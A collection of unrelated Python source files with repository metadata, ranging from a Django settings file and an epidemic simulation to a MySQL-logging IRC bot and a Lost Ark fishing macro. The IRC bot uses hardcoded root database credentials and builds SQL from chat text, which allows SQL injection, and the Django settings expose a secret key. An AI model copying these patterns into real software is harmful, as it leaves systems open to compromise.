['Голованов Ярослав Кириллович', 172, 79],
['Горбатко Виктор Васильевич', 166, 64],
['Греков Николай Сергеевич', 178, 85],
['Гречаник Алексей Анатольевич', 182, 90],
['Гречко Георгий Михайлович', 190, 99],
['Грищенко Виталий Андреевич', 170, 77],
]
totalWeight = 0
for fullName, growth, weight in cosmonauts:
print('Космонавт ', fullName, ' рост - ', growth, 'см, вес - ', weight, ' кг')
totalWeight += weight
cosmonautsSorted = sorted(cosmonauts,key = lambda i: i[1])
minGrowth = cosmonautsSorted[0]
maxGrowth = cosmonautsSorted[len(cosmonautsSorted) - 1]
print('Всего космонавтов ', len(cosmonauts), ' человек')
print('Минимальный рост - ', minGrowth[1], 'см у ', minGrowth[0])
print('Максимальный рост - ', maxGrowth[1], 'см у ', maxGrowth[0])
print('Общий вес космонавтов - ', totalWeight, ' кг')
|
[
"ivan550zero@mail.ru"
] |
ivan550zero@mail.ru
|
9e5a07f65283e7fe0ea8edae909ebfdc45a58631
|
f17bb44a1d3b5102155f4cd251a0234bf2a50f87
|
/typeidea/settings.py
|
2febadaf5ef2b83224ef7939ba2ee4e953eccfb7
|
[] |
no_license
|
ScottYuan0805/django_test
|
4aadb9aba87f184d8e601d46645a8851093484ab
|
a0f9b5470892b6eed6d7add026671b54c6ba43a4
|
refs/heads/master
| 2020-09-04T20:15:13.156103
| 2019-11-05T06:50:17
| 2019-11-05T06:50:17
| 219,880,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,103
|
py
|
"""
Django settings for typeidea project.
Generated by 'django-admin startproject' using Django 1.11.26.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'r5=ire$20pv0zmoy2f0jt95wys65+^q2hcz!)47iw#wq+u!0et'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'typeidea.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'typeidea.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"boluoerzi@163.com"
] |
boluoerzi@163.com
|
bbe33eebae6cc991d331c697f0a3ebacb04af968
|
462288b945e619ae2d24d93f1ead3aa2e412f01f
|
/data_loader.py
|
8875a1ed414ba6ac0c79c87ff31a73ce1fc64708
|
[] |
no_license
|
Zilo676/neuralNetwork
|
d57a365421351b01a15cc231b9539bf42c061479
|
5be1e83daec0f034039bc1453bfb786d1cca7886
|
refs/heads/master
| 2020-03-18T00:32:48.531092
| 2018-10-12T08:10:02
| 2018-10-12T08:10:02
| 134,100,320
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,730
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 29 21:50:13 2018
@author: santit, zilo
"""
import pandas as pd
import numpy as np
import os
class End_of_DB(Exception):
def __init__(self, db_name):
self.db_name = db_name
def __str__(self):
return "End of database: " + str(self.db_name)
class data_base:
def __init__(self, name_db, batch_size, data_shift):
"""
Инициализация класса data_base
"""
self._name_db = name_db
if self._name_db[-1]!='/':
self._name_db = self._name_db + '/'
self._file_list = os.listdir(path=self._name_db)
self._cur_file_index = 0
self._cur_index = 0
self._batch_size = batch_size
self._data_shift = data_shift
self._current_data = self._load_from_file_by_index(self._cur_file_index)
def _load_from_file(self, file_name):
data = pd.read_csv(self._name_db + file_name, header=None,skiprows=1)
return data.astype(np.float32)
def _load_from_file_by_index(self, index):
return self._load_from_file(self._file_list[index])
def get_batch(self):
if (self._cur_index + self._batch_size) >= self._current_data.shape[0]:
if self._cur_file_index+1 >= len(self._file_list):
raise End_of_DB(self._name_db)
self._current_data = self._load_from_file_by_index(self._cur_file_index + 1)
self._cur_file_index += 1
self._cur_index = 0
data = self._current_data[self._cur_index:self._cur_index + self._batch_size].as_matrix()
self._cur_index += self._data_shift
return data
|
[
"plotb323@yandex.ru"
] |
plotb323@yandex.ru
|
f9fe27ffda166bdfb85ddb2f78d9825b780a74a3
|
e9dcc3b1368d4d4e4f88f7cd7eeedea3f370a99c
|
/plotInfectionTrace.py
|
a1ebe941a83c2360897c5b6866e5050f65171103
|
[] |
no_license
|
nwlandry/SimplexSIS
|
065034537b69321917c26f602575b438a22dd664
|
d70c1ae043698d2974e1ddf177c229600d569088
|
refs/heads/master
| 2022-12-24T14:38:01.547835
| 2020-06-30T02:56:23
| 2020-06-30T02:56:23
| 220,497,431
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,771
|
py
|
import numpy as np
import matplotlib.pyplot as plt
from scipy.sparse import csr_matrix
from scipy.sparse.linalg import eigs
import random
import simplexUtilities
import simplexContagion
import pickle
from datetime import datetime
import time
import multiprocessing as mp
# graph parameters
# graph parameters
exponent = 4 # power law exponent
minDegree = 67
maxDegree = 1000
n = 10000
simplexSize = 3
isDegreeCorrelated = True
degreeDistType = "power-law"
meanSimplexDegree = 30
meanDegree = 10
isRandom = True
#simulation parameters
timesteps = 100
dt = 0.1
numNodesToRestart = 0.0001
gamma = 2
betaCritFraction = 1.03
alpha = 0.0
# Epidemic parameters
initialFraction = 0.01
x01 = np.random.choice([0, 1], size=n, p=[1-initialFraction, initialFraction])
# initialFraction = 1
# x02 = np.random.choice([0, 1], size=n, p=[1-initialFraction, initialFraction])
initialConditions = [x01]
# generate degree sequence and adjacency matrix
if degreeDistType == "uniform":
degreeSequence = simplexUtilities.generateUniformDegreeSequence(n, minDegree, maxDegree, isRandom=isRandom)
elif degreeDistType == "power-law":
degreeSequence = simplexUtilities.generatePowerLawDegreeSequence(n, minDegree, maxDegree, exponent, isRandom=isRandom)
elif degreeDistType == "poisson":
degreeSequence = simplexUtilities.generatePoissonDegreeSequence(n, meanDegree)
A = simplexUtilities.generateConfigModelAdjacency(degreeSequence)
# Calculate values needed in critical value calculation
meanDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 1)
meanSquaredDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 2)
meanCubedDegree = simplexUtilities.meanPowerOfDegree(degreeSequence, 3)
print("The mean degree is {:.2f}".format(meanDegree))
print("The mean squared degree is {:.2f}".format(meanSquaredDegree))
print("The mean cubed degree is {:.2f}".format(meanCubedDegree))
print("{} self-loops".format(np.trace(A.todense())))
#Generate simplex list
if isDegreeCorrelated:
[simplexList, simplexIndices] = simplexUtilities.generateConfigModelSimplexList(degreeSequence, simplexSize)
else:
[simplexList, simplexIndices] = simplexUtilities.generateUniformSimplexList(n, meanSimplexDegree, simplexSize)
betaCrit = meanDegree/meanSquaredDegree*gamma
beta = betaCritFraction*betaCrit
plt.figure()
start = time.time()
for x0 in initialConditions:
averageInfection, endState = simplexContagion.microscopicSimplexSISDynamics(A, simplexList, simplexIndices, gamma, beta, alpha, x0, timesteps, dt, numNodesToRestart)
plt.plot(np.linspace(0, (timesteps-1)*dt, timesteps), averageInfection)
end = time.time()
print('The elapsed time is ' + str(end-start) + 's')
plt.xlabel("time", fontsize=18)
plt.ylabel(r"$\langle I\rangle$", fontsize=18)
plt.show()
|
[
"nicholas.landry.91@gmail.com"
] |
nicholas.landry.91@gmail.com
|
656b2b5c2d0909c3a0a06634440e9316cfac9d4d
|
fd63e5cfc880432d7bdb7c36481266d681539f76
|
/no_shebang.py
|
31a586f00b09957136f2cb41d57bd224aa798c43
|
[] |
no_license
|
MasterOlaga/mycode
|
de8425e5f32affcd803ecb44cb6bdba1f327f774
|
69f6b8747f1dbc5ae4762a39fb5aaa0b4650ab63
|
refs/heads/main
| 2023-04-10T18:57:48.585811
| 2021-05-04T12:05:11
| 2021-05-04T12:05:11
| 361,783,394
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
print("hello")
print("Did you say, Yello")
print("No, I said Hello, but that\'s close enough.")
|
[
"xcurl2009@hotmail.com"
] |
xcurl2009@hotmail.com
|
bdd46fe9ef30e0c61b9a28258ff2c826f1bcd0a7
|
332d39e324f72b56b77607970812675e58742b15
|
/prob6-min-max-unsorted-array.py
|
fcb87f60c4f95f58502e7b4299ae2a6589121376
|
[] |
no_license
|
sean-stanley/Data-Structures-and-Algorithms--project-2
|
789d01c5156a85c17f2c803f1288a8d045705d2b
|
94cbe2642277cdf0d438f6f1ea61c28084cc388d
|
refs/heads/master
| 2020-07-08T16:16:33.881502
| 2019-08-22T05:36:41
| 2019-08-22T05:36:41
| 203,721,718
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,424
|
py
|
import math
import random
def get_min_max(ints):
"""
Return a tuple(min, max) out of list of unsorted integers.
Args:
ints(list): list of integers containing one or more integers
"""
curr_min = math.inf
curr_max = -math.inf
for num in ints:
if int(num) > curr_max:
curr_max = num
if int(num) < curr_min:
curr_min = num
return (int(curr_min), int(curr_max))
# Example Test Case of Ten Integers
def tests():
"""Print "Pass" for 1 straightforward test and 2 edge cases."""
# test 1
list_of_ints = [i for i in range(0, 10)] # a list containing 0 - 9
random.shuffle(list_of_ints)
print("Pass" if ((0, 9) == get_min_max(list_of_ints)) else "Fail")
# test 2 (edgy) negative numbers
list_of_ints = [i for i in range(-10, 0)]
random.shuffle(list_of_ints)
print("Pass" if ((-10, -1) == get_min_max(list_of_ints)) else "Fail")
# test 3 (edgy) floats
list_of_inputs = [i/2 for i in range(0, 20, 1)]
random.shuffle(list_of_inputs)
print("Pass" if ((0, 9) == get_min_max(list_of_inputs)) else "Fail")
# test 4 (edgy) tiny list
print("Pass" if ((3, 3) == get_min_max([3.14])) else "Fail")
# test 4 large ints
list_of_ints = [i for i in range(-1000, 1000, 10)]
random.shuffle(list_of_ints)
print("Pass" if ((-1000, 990) == get_min_max(list_of_ints)) else "Fail")
tests()
|
[
"sean@redheadweb.nz"
] |
sean@redheadweb.nz
|
a65adf6823bcb9b87df180963c80b6a02c76c94f
|
04842b58ea1b42a45b343e319e0b362f6e9fea58
|
/beta/email_invite.py
|
b09166c8481387918060814951e16932a5b40f5f
|
[
"Artistic-2.0"
] |
permissive
|
sanketnawle/alpha
|
b8a7af06d162523faf294cf732ff455bb9ba3064
|
fd6c702b58685b67f35a4e772d1287fb49749696
|
refs/heads/master
| 2021-01-22T06:18:47.005611
| 2015-04-14T05:31:04
| 2015-04-14T05:31:04
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 816
|
py
|
#!/usr/bin/env python
try:
import xlrd
except ImportError:
print "Error importing"
import string
import re
import json
import sys
import os
arguments = sys.argv
file_name = arguments[1]
emails = []
errors = []
wb = xlrd.open_workbook(file_name)
for sheet in wb.sheets():
number_of_columns = sheet.ncols
number_of_rows = sheet.nrows
if number_of_columns > 1000:
number_of_columns = 1000
if number_of_rows > 1000:
number_of_rows = 1000
for col in range(number_of_columns):
for row in range(number_of_rows):
value = (sheet.cell(row, col).value)
value = str(value)
if value.replace(" ", "") == '':
continue
else:
emails.append(value)
os.remove(file_name)
print json.dumps(emails)
|
[
"K@dhcp-10-4-143-39.wireless.rochester.edu"
] |
K@dhcp-10-4-143-39.wireless.rochester.edu
|
a215d60f2ee732a42e6179f1c3093a74ca35917b
|
76d6f79f3b1a2d604ef05b39ac22ef1402ce95ed
|
/postional_keyword_kwargs.py
|
8bebda4495396928708108c0ca3fdd9f1757c004
|
[] |
no_license
|
anunay-kumar/python-datastructure
|
55616976776b7d0818af7d679a1ca67a4b1562ad
|
a8056fca5dd1bc05e9f2904b7ecbb9a9914e1539
|
refs/heads/main
| 2023-06-25T12:08:41.124572
| 2021-07-20T13:50:34
| 2021-07-20T13:50:34
| 362,399,464
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 641
|
py
|
#!/usr/bin/python
#using postional and dynamic keywords arguments
def format_customer(first_name,last_name,**kwargs):
strLocation = ""
for key, value in kwargs.items():
if key == "location":
strLocation = "(" + value + ")"
print(kwargs['location'])
print(type(kwargs))
print(kwargs)
return first_name + " " + last_name + strLocation
#using postional and keyword argumaets
def format_customer1(first_name,last_name,location=None):
if location:
return '%s %s (%s)' % (first_name, last_name, location)
else:
return '%s %s' % (first_name, last_name)
|
[
"noreply@github.com"
] |
anunay-kumar.noreply@github.com
|
8c42d6d5f5f8e007d9bf9e0ade965a3b28f5cc26
|
c7faf6b2e3d4511c3635589ed0bbd3647cb6425b
|
/test.py
|
bc5078eb105cc2df3fd147c214c122222be09323
|
[] |
no_license
|
nnaliu/PennApps2015
|
2f183c536f7ac95d50125dc82caa3348325bacad
|
594c032384be6766fe54fbdf51265361e794c391
|
refs/heads/master
| 2021-01-21T11:08:32.342303
| 2015-09-05T22:23:58
| 2015-09-05T22:23:58
| 41,969,753
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,290
|
py
|
import urllib2
from zipfile import ZipFile
from StringIO import StringIO
import json
import csv
from pymongo import MongoClient, GEO2D
client = MongoClient()
db = client.crimes
philly_crimes = db.philly
philly_crimes.ensure_index([('loc', GEO2D)])
url = urllib2.urlopen("http://gis.phila.gov/gisdata/police_inct.zip")
zipfile = ZipFile(StringIO(url.read()))
with zipfile.open('police_inct.csv') as csvfile:
crimes = csv.DictReader(csvfile, delimiter=',')
for crime in crimes:
print crime['TEXT_GENERAL_CODE']
check_duplicate = philly_crimes.find_one({'_id': crime['OBJECTID']})
if check_duplicate == None and crime['DISPATCH_DATE'] > '2015-07-01' and \
(crime['POINT_X'] != "" and crime['POINT_Y'] != ""):
record = {}
record['_id'] = crime['OBJECTID']
record['date'] = crime['DISPATCH_DATE']
record['time'] = crime['DISPATCH_TIME']
record['address'] = crime['LOCATION_BLOCK']
record['type'] = crime['TEXT_GENERAL_CODE']
record['loc'] = [float(crime['POINT_X']), float(crime['POINT_Y'])]
philly_crimes.insert_one(record)
print(record)
#url = 'https://api.everyblock.com/content/philly/topnews/?token=2468648eaf3a967061f727a478bd0b703797dc01&schema=crime&date=descending'
#while url != None:
# response = urllib2.urlopen(url)
# data = json.load(response)
# for item in data['results']:
# check_duplicate = philly_crimes.find_one({'_id': item['id']})
# if check_duplicate == None:
# record = {}
# record['_id'] = item['id']
# record['title'] = item['title']
# record['item_date'] = item['item_date']
# record['location'] = item['location_name']
# record['url'] = item['url']
# addressUrl = 'https://maps.googleapis.com/maps/api/geocode/json?address=' \
# + record['location'].replace(' ', '+') + ',+Philadelphia,+PA&key=AIzaSyB9FBh9QtZ1UbwAyn5rr_jXx8dlTk8lONc'
# addressResponse = urllib2.urlopen(addressUrl)
# addressData = json.load(addressResponse)
# addressDataLocation = addressData['results'][0]['geometry']['location']
# record['loc'] = [addressDataLocation['lng'], addressDataLocation['lat']]
# philly_crimes.insert_one(record)
# print(record['lat'])
# print
# else:
# break
#url = data['next']
# for i in all_records:
# print(i)
#Google Maps API Key: AIzaSyB9FBh9QtZ1UbwAyn5rr_jXx8dlTk8lONc
|
[
"annaliu@college.harvard.edu"
] |
annaliu@college.harvard.edu
|
2941126397a260246fd63bc18c58f7812cab2e59
|
330802c408d66e1c6e37dd7087f2f949570438ff
|
/Python/easy/762.py
|
4e6a6820f71fc86b1e8c568d33872abc168f8494
|
[] |
no_license
|
HeyZOJian/leetcode
|
ea93da6c4f6cbd6bfb60b9f0a0c4cb21a5907687
|
5cae29c4825c122b1fdec9ead32939a20bf3129d
|
refs/heads/master
| 2021-05-05T07:10:50.104077
| 2018-10-05T01:44:13
| 2018-10-05T01:44:13
| 118,855,381
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,112
|
py
|
"""
762. Prime Number of Set Bits in Binary Representation
Given two integers L and R,
find the count of numbers in the range [L, R] (inclusive) having a prime number of set bits in their binary representation.
(Recall that the number of set bits an integer has is the number of 1s present when written in binary.
For example, 21 written in binary is 10101 which has 3 set bits. Also, 1 is not a prime.)
Input:
L = 6, R = 10
Output:
4
Explanation:
6 -> 110 (2 set bits, 2 is prime)
7 -> 111 (3 set bits, 3 is prime)
9 -> 1001 (2 set bits , 2 is prime)
10->1010 (2 set bits , 2 is prime)
Note:
L, R will be integers L <= R in the range [1, 10^6].
R - L will be at most 10000.
先打个10^6内二进制和的素数的表
"""
class Solution:
    def countPrimeSetBits(self, L, R):
        """Count numbers in [L, R] whose binary popcount is a prime.

        :type L: int
        :type R: int
        :rtype: int
        """
        # Numbers up to 10^6 need at most 20 bits, so only these primes
        # can ever appear as a popcount.
        prime_popcounts = {2, 3, 5, 7, 11, 13, 17, 19}
        total = 0
        for value in range(L, R + 1):
            if bin(value).count("1") in prime_popcounts:
                total += 1
        return total
if __name__ == "__main__":
print(Solution().countPrimeSetBits(6, 10))
|
[
"hellozojian@gmail.com"
] |
hellozojian@gmail.com
|
1c4cf0013c46249d218e7490a27b50072971f949
|
9ddfd30620c39fb73ac57e79eae0a001c45db45f
|
/addons/product_quotation_tracking/models/product_template.py
|
064724ad58d38da8ad5a7bb62235b8a2d14da913
|
[] |
no_license
|
zamzamintl/silver
|
a89bacc1ba6a7a59de1a92e3f7c149df0468e185
|
8628e4419c4ee77928c04c1591311707acd2465e
|
refs/heads/master
| 2023-01-06T20:29:25.372314
| 2020-10-29T21:02:41
| 2020-10-29T21:02:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,164
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api, exceptions, _
from datetime import date, datetime, time, timedelta
from odoo.fields import Date, Datetime
from odoo.tools import float_compare
import odoo.addons.decimal_precision as dp
class ProductTemplate(models.Model):
    """Extend ``product.template`` with chatter tracking on core fields.

    Each field below re-declares an inherited field only to add
    ``track_visibility='onchange'`` so value changes are logged on the
    record's message thread.  NOTE(review): this relies on Odoo merging
    the extra attribute into the inherited field definition — confirm
    against the target Odoo version.
    """
    _inherit = 'product.template'
    # Re-declared standard fields, purely to enable change tracking.
    name = fields.Char('Name', track_visibility='onchange')
    type = fields.Selection(track_visibility='onchange')
    categ_id = fields.Many2one(track_visibility='onchange')
    list_price = fields.Float(track_visibility='onchange')
    standard_price = fields.Float(track_visibility='onchange')
    sale_ok = fields.Boolean(track_visibility='onchange')
    purchase_ok = fields.Boolean(track_visibility='onchange')
    uom_id = fields.Many2one(track_visibility='onchange')
    default_code = fields.Char(track_visibility='onchange')
    barcode = fields.Char(track_visibility='onchange')
    invoice_policy = fields.Selection(track_visibility='onchange')
    purchase_method = fields.Selection(track_visibility='onchange')
    sale_delay = fields.Float(track_visibility='onchange')
|
[
"mohamed.abdelrahman@businessborderlines.com"
] |
mohamed.abdelrahman@businessborderlines.com
|
6fa4ee18cbed580b920fd118075a75733be9f362
|
cb798b7b41ce53ae40ffbdae153223d4f9da710a
|
/test.py
|
a865f195f2319bdc84e285d98fb9e0f26cea244c
|
[
"MIT"
] |
permissive
|
sknsensor/ProjektPV
|
d4fd80e4cd2e504a557b0a180777b54a6964aa02
|
666703301af31bfa841067a62d70bceafc7cdc56
|
refs/heads/master
| 2023-09-02T23:46:10.063321
| 2021-10-08T07:55:17
| 2021-10-08T07:55:17
| 412,421,373
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 64
|
py
|
# Print the current local date and time.
import datetime

current_moment = datetime.datetime.now()
print(current_moment)
|
[
"noreply@github.com"
] |
sknsensor.noreply@github.com
|
feed65fa40a4abf2962765310952122a4f84745f
|
16f44549df680ffc6511066d9fd17fbca7cc2b73
|
/appnomi/apps.py
|
013825213347d1d1cf27265c57353f1a313517c8
|
[] |
no_license
|
ShahzodAhadov/BlogProject
|
f483c29a16746e4516a97f37a59ca98147e6fe7d
|
501e3cc76e10a66c9582b592cfed9e1d0c90a78e
|
refs/heads/master
| 2023-07-12T06:55:54.563040
| 2021-08-14T13:45:46
| 2021-08-14T13:45:46
| 395,113,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 146
|
py
|
from django.apps import AppConfig
class AppnomiConfig(AppConfig):
    """Django application configuration for the ``appnomi`` app."""
    # Use 64-bit auto-incrementing primary keys by default.
    default_auto_field = 'django.db.models.BigAutoField'
    name = 'appnomi'
|
[
"88456020+ShahzodAhadov@users.noreply.github.com"
] |
88456020+ShahzodAhadov@users.noreply.github.com
|
a8ed538a69a20d50846b39626eeafcdfd0aa7369
|
d513604d844b116020bd7e0a2b6d5ca5337836ef
|
/Package1/Module1/__init__.py
|
3313db9ea5869b18d5dfa2ae6e954f7024d16496
|
[] |
no_license
|
sbenkler/osparc-lab-ci-travis-trial
|
cf1110bdefa469ab1b717bb2d98e3f2d7fd96f38
|
f75682322c70f989228434cb8d45ac7f735fec4b
|
refs/heads/master
| 2021-08-23T21:16:55.739360
| 2017-12-06T14:41:51
| 2017-12-06T14:41:51
| 113,040,117
| 0
| 0
| null | 2017-12-04T12:33:34
| 2017-12-04T12:33:34
| null |
UTF-8
|
Python
| false
| false
| 28
|
py
|
''' Documents this file '''
|
[
"benkler@zurichmedtech.com"
] |
benkler@zurichmedtech.com
|
2136a658ded5696c4d73ee134946c16f6b5d2f4c
|
f5b578d57dcd097c7396aaf43c79ab1f47434291
|
/6.py
|
e65f5f8155612f1cc0d659aa8f61af05854f3512
|
[] |
no_license
|
v-piatakova/python
|
d357bae1166aceed7d79691a59614055c3557500
|
5504d0b3d61a9b904163d8e988f0623e75d7307d
|
refs/heads/master
| 2021-12-06T23:19:03.576740
| 2021-11-12T18:51:45
| 2021-11-12T18:51:45
| 199,714,623
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
string = input("Enter some string")
def get_shortest_word(string):
    """Print and return the shortest space-separated word in *string*.

    Splits on single spaces; on a tie the earliest word wins because
    ``min`` keeps the first minimum it sees.
    """
    words = string.split(" ")
    shortest = min(words, key=len)
    print(shortest)
    # Fixed: the original only printed the result (and a debug dump of the
    # split list) but returned None, despite the "get_" name — return the
    # value so callers can actually use it.
    return shortest
get_shortest_word(string)
|
[
"noreply@github.com"
] |
v-piatakova.noreply@github.com
|
975fea9c39c6f2c440038597d0c37bb3c74458ed
|
b1bd2f6c34539a90fbe114bbe88ded74ddffc488
|
/learning/GUI/chapter2/entry1.py
|
f5947011c3751f8fce33a3281c6d91a43fb78916
|
[] |
no_license
|
Calvin-WangA/learning
|
e6a6bfab6ec685f96799f22dbdbde64b6be3454b
|
f4e5599be0451eae4ac51270d03b0b9d1dd073db
|
refs/heads/master
| 2021-01-13T13:21:05.179958
| 2016-04-19T02:40:40
| 2016-04-19T02:40:40
| 52,593,144
| 0
| 0
| null | 2016-03-15T13:37:24
| 2016-02-26T09:21:53
|
Python
|
UTF-8
|
Python
| false
| false
| 442
|
py
|
'''
Created on 2016年3月4日
@author: CasparWang
'''
from tkinter import *
from quitter import Quitter
def fetch():
    # Echo whatever is currently typed in the Entry widget to stdout.
    print('Input => "%s"' %ent.get())

# Build a one-field window: an Entry on top, a Fetch button and a quit
# button (from the local quitter module) underneath.
root = Tk()
ent = Entry(root)
# Pre-fill with placeholder text and give the field keyboard focus.
ent.insert(0,'Type words here')
ent.pack(side=TOP,fill=X)
ent.focus()
# Pressing Enter inside the field triggers the same action as the button.
ent.bind('<Return>',(lambda event: fetch()))
btn = Button(root,text='Fetch',command=fetch)
btn.pack(side=LEFT)
Quitter(root).pack(side=RIGHT)
root.mainloop()
|
[
"18971674156@163.com"
] |
18971674156@163.com
|
6c4251722cd0f359b551bc245748f24cc8818cdf
|
1ed48f51e859618b63ab6d14a82f94aa512c7ba1
|
/irc bot with sql intergration.py
|
e75a8a118e7e1b8f83ab1d059cbcd3a07128508b
|
[] |
no_license
|
Panda911/vindra
|
6866c0fbd7ab7133672ccccfe0003e9ae1470f3c
|
95d1170d848752c335a9c89141332d71654671fe
|
refs/heads/master
| 2021-01-10T16:03:08.031837
| 2016-03-17T12:26:38
| 2016-03-17T12:26:38
| 54,115,962
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,206
|
py
|
import socket, MySQLdb
from time import strftime
def contains(str, test):
    """Return True when *test* occurs as a substring of *str*.

    An empty *test* always matches, mirroring the original sliding-window
    scan (str[c:c] == '' for any c).
    """
    # Idiom fix: the original re-implemented substring search with a
    # manual O(n*m) window loop; the built-in ``in`` operator is
    # equivalent (including the empty-string and too-long-test cases)
    # and uses an optimized search.
    return test in str
def debug(message):
    # Print *message* when the global debug flag is truthy.
    # NOTE(review): the module-level assignment ``debug = True`` just below
    # rebinds this very name to a bool, so later ``debug(...)`` calls would
    # raise TypeError ('bool' object is not callable) — rename either the
    # flag or this function.
    if debug:
        print message
# --- configuration / connection setup --------------------------------------
# NOTE(review): this rebinds the ``debug`` function defined above to a bool,
# so the ``debug(...)`` calls in the loop below would raise TypeError.
debug = True
network = 'chat.freenode.net'
port = 6667
irc = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
username = ''
door = 0
debug_prefix = '[DEBUG]: '
# db = MySQLdb.connect('localhost', 'root', 'toor', 'vindra')
db = MySQLdb.connect('localhost', 'root', 'toor', 'vindra')
cursor = db.cursor()
print ("Starting up...")
irc.connect ( ( network, port ) )
#print irc.recv ( 4096 )
irc.send ( 'NICK vindra\r\n' )
irc.send ( 'USER vindra vindra vindra :Python IRC\r\n' )
irc.send ( 'JOIN #hacklabto\r\n' )
print ("Connected!")
# --- main receive loop: log doorbot enter/leave events to MySQL ------------
while True:
    data = irc.recv ( 4096 )
    debug("baud: 4096")
    # Answer server keep-alive pings.
    if data.find ( 'PING' ) != -1:
        irc.send ( 'PONG ' + data.split() [ 1 ] + '\r\n' )
    # NOTE(review): str.find returns -1 (truthy!) when absent, so this
    # branch fires for almost every message; compare against -1 as above.
    if data.find ( 'doorbot'):
        debug(debug_prefix + 'Got Message: ' + str(data)) # echo35 debug
    if data.find ( 'HackLab' ):
        split = data.split('hacklabto :')
        message = str(data).split("#")
        if (len(message) > 1):
            # Strip channel/message boilerplate down to "<alias> left/entered".
            message = message[1].replace('hacklabto :', '').replace(' has', '').replace(' Classroom.', '').replace(' HackLab.', '').replace(' HackLab', '').replace('\r\n', '')
            if contains(message, "left"):
                debug(debug_prefix + "Got alias leaving: " + message.replace(' left', ''))
                username = message.replace(' left', '')
                # NOTE(review): string-formatted SQL is open to injection —
                # use cursor.execute(sql, params) placeholders instead.
                query = "INSERT INTO test(username, str) VALUES('%s', '%s')" % (username, "EXIT") #FINISH WRITING PROPER MYSQL QUERY - ECHO35
                cursor.execute(query)
                db.commit()
            elif contains(message, "entered"):
                debug(debug_prefix + "Got alias entering: " + message.replace(' entered', ''))
                username = message.replace(' entered', '')
                query = "INSERT INTO test(username, str) VALUES('%s', '%s')" % (username, "ENTER")
                cursor.execute(query)
                db.commit()
|
[
"root@localhost.localdomain"
] |
root@localhost.localdomain
|
b6cddc9bc45ab2cf0a234d1a3ec9f3f72a12841b
|
8ea7f954fd3316aa36803e85b19572c39d0f5d49
|
/lostark_fishing.py
|
78ab83887d14c371063b24f34978deb599857f50
|
[] |
no_license
|
hyeokju1313/LostArkFishingMacro
|
5d00bc6302e516f35f215b67d5ddd985a724532b
|
34bc751d8bf247272fb0159862fde1df38b2a356
|
refs/heads/main
| 2023-04-14T15:45:23.028151
| 2021-04-26T11:26:47
| 2021-04-26T11:26:47
| 361,723,880
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,286
|
py
|
import fishing_image as fi
import fishing_place as fp
import pyautogui as pa
import random
import time
from init_config import *
# - Takes an image name; when the image appears on screen, sends the given key press -
def findImgAndPressKey(imgName, key, startPos, cnt=60, confidence=.8, wait=0.1):
    """Poll the screen for *imgName*; press *key* once it shows up.

    Returns True when the image was found and the key was sent,
    False when the search gave up after *cnt* attempts.
    """
